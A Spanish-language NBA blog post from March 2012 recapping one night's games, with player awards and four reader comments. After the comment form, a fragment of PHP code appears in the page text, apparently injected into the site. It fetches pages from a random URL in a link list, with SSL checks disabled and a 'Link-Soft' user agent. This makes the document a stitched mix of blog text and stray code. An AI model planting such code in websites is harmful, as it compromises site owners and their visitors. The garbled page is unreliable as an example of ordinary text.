La Crónica: ¿El primer día del resto de sus vidas?

15 de March de 2012 por TheDeerHunter

Hoy es el primer día del resto de vuestras vidas. También es el primer día de la de algunas figuras de la NBA, que en cuanto se alcance el deadline para realizar traspasos en la NBA, tendrán que coger un avión hacia un futuro deportivo incierto. En toda la temporada no se puede aplicar mejor aquello de que quizás haya sido la última vez que veamos a determinados jugadores vestir una camiseta aunque es cierto que todo da la impresión de quedar en agua de borrajas.

Empezamos por Dwight Howard. Después de marear la perdiz durante toda la temporada ahora parece que ha decidido quedarse en los Magic hasta el final de 2013, es decir, que no aprovechará su Player Option para salir al mercado. Además ha pedido disculpas y ha declarado que ha estado mal aconsejado. Puyita para su agente. Para celebrar la decisión se marcó un buen partido, así como Jameer Nelson, extraordinario, pero la defensa del equipo es para hacérselo mirar. Los Spurs parecían los Kings de los mejores años. Huele a que no será la última derrota de Supermán con esa camiseta (111-122).

También mejoran las expectativas de Pau en L.A. aunque ni por esas le viéramos recuperar el buen rollo. Sería irónico que mañana estuviera más próximo al anillo que a otros horizontes. Quién lo sabe, pero si anoche hubiera sido su último partido, fue un sólido colofón a una irreprochable trayectoria de dorado y púrpura. Victoria sufrida en NOLA, con prórroga (107-101). El punto de mira ahora está en Blake y habrán muy pocos que le echarán de menos.

El tema Rondo se ha enfriado como la mayoría. Anoche sólo correcto ante Golden State, pero Garnett y Bass se bastaron para doblegar a Lee y “el hombre que mira menos aro de la historia” Biedrins (105-103). Sensacional partido de la dupla Nanet Robinson y Klay Thompson. A éste último se le ha abierto el cielo ahora.

Como él, algunos ya han comenzado a disfrutar de los cambios. En medio de rumores de abandonar el barco de cierto Melo que no quiero nombrar, los Knicks celebraron la marcha de D’Antoni con una merendola ante los Blazers (79-121). Mal Lin, pero imparable segunda unidad con Novak, Smith y Sumphert. Quizás no volvamos a ver a Crawford con la camiseta de Blazers. Anoche le dejaron en la grada.

Muchos más partidos que repasamos de pasada. Sólida victoria de Indiana ante Sixers (94-111); Humphries y Gerald Green (sí, lo habéis leido bien) doblegaron a los Raptors (84-98); los Rockets no sudaron demasiado para regalarle la vigésima derrota foránea a Charlotte (87-107); triple-doble de Gooden ante Cavs para celebrar no sé qué (105-115); impactante victoria de los Bulls sin Rose ante Heat (102-106); victoria de Pistons en Sacramento con más de un 58% de acierto (124-112); Mo Williams desatascó a los Clippers ante Atlanta (82-96) y, para terminar, el trío Frye-Gortat-Dudley se salieron para tumbar a Utah (111-120).

PREMIOS

MVP: Greg Monroe y Rodney Stuckey explotaron simultáneamente. El primero se fue a los 32 puntos (15 de 20) y 11 rebotes y el segundo a los 35 puntos (10 de 18), 5 reboets y 6 asistencias. Tony Parker, con 31 puntos y 12 asistencias y una vez más, Andrew Bynum, con 25 puntos, 18 reboets, 2 robos y 2 tapones, también merecen ser destacados.

Rookie: Kyrie Irving anotó 28 puntos (11 de 15) pero perdió 8 balones. En GS, Klay Thompson empieza a ofrecer lo que se espera de él tras la marcha de Monta Ellis, 26 puntos y 4 asistencias.

Sorpresa: En ausencia de Derrick Rose fue John Lucas el que se puso el traje de anotador para conseguir 24 puntos con un 9 de 12 en tiro. Por su parte, Tayshaun Prince se unió a la fiesta de sus compañeros con 28 puntos, 5 rebotes y 7 asistencias mientras que Jameer Nelson cuajó su mejor partido del año con 25 puntos, 5 rebotes y 7 asistencias. El “matador” Gerald Green anotó 26 puntos en 25 minutos.

Decepción: Minutos para Andris Biedrins  que se quedó sin anotar en 18 minutos de juego. Los Blazers volvieron a quedarse por debajo de los 80 puntos, cayendo de más de 40 puntos ante los Knicks.  Y eso que Landry Fields se marcó un 0 de 6…

Esfuerzo en vano: Los Bulls le dieron un toque a los Heat y a Lebron James, el mejor de su equipo con 35 puntos, 5 rebotes, 4 asistencias y 4 robos. Jarrett Jack fue el jugador de New Orleans que más luchó frente los Lakers. Sus 30 puntos, 6 asistencias y 2 tapones no sirvieron finalmente para llevarse la vcitoria.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    http://www.nba.com/video/games/clippers/2012/03/14/0021100636_atl_lac_play4.nba/

    Y con todos ustedes…. blaaaakeeee… griffinnnn!!

      Citar

  2. Ru dice:
    #2

    Jose Luis:
    http://www.nba.com/video/games/clippers/2012/03/14/0021100636_atl_lac_play4.nba/

    Y con todos ustedes…. blaaaakeeee… griffinnnn!!

    Es ridículo que se vean esas cosas a este nivel de profesionales..es como la mecánica de tiro de Chuck Hayes,si fueran alevines o infantiles pues tiene un pase,pero jugadores profesionales que cobran millones de dólares…es para arrancarse los ojos.

    La rotación de Boston es muy muy preocupante,Dooling,Stiemsma,Pietrus y Bradley desde el banquillo.Supongo que intentarán mover a Ray Allen hasta última hora y si no consiguen nada,sin Jermaine,Jeff Green ni Wilcox,podremos ver la versión 2.0 de Rasheed Wallace y contrataciones desde la liga de desarrollo,pero vamos,que no corren buenos tiempos para Boston.

      Citar

  3. Sancho88 dice:
    #3

    Ru, pues te parecerá sorprendente, pero el señor Hayes firma un decente 67%, para lo mal que tira. Y además, ha mejorada notablemente su mecánica de tiro libre, en serio.. Yo también le vi en Houston, pero he visto comparaciones, la misma imagen tirando un tiro libre en Houston y luego tirándolo en Sacramento, y te puedo asegurar que tira bastante mejor. Ahora se pone de puntillas para llegar, y aunque sigue tirando como si tuviera el brazo agarrotado, es más efectivo. No sé, es un tipo consciente de sus limitaciones, pero que ayuda muchísimo en defensa, y tiene muy buena lectura del ataque. Es un buen poste para hacer sistemas jugando desde arriba, porque tiene buena técnica de pase

      Citar

  4. Sancho88 dice:
    #4

    Deer, también esfuerzo en vano de Jason Thompson con los Kings. 21-15-4. No valieron de nada ante el impresionante trío Stuckey-Prince-Monroe. Prince parecía el jugador que en 2004 ganó el anillo. Ya se ha quitado casi toda la parafernalia que protegía su rodilla, y parece que ha ganado confianza total, que está recuperado al cien por cien de la lesión de rodilla, cuando corre ya no parece que se arrastra, y obviamente, calidad tiene, y si está bien físicamente es un alero que ha estado en muchas batallas, tiene buena mano y no se va a arrugar a estas alturas de su carrera. Buena pinta de los Pistons de cara al año que viene, con Knight, Jerebko, Monroe, Stuckey…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>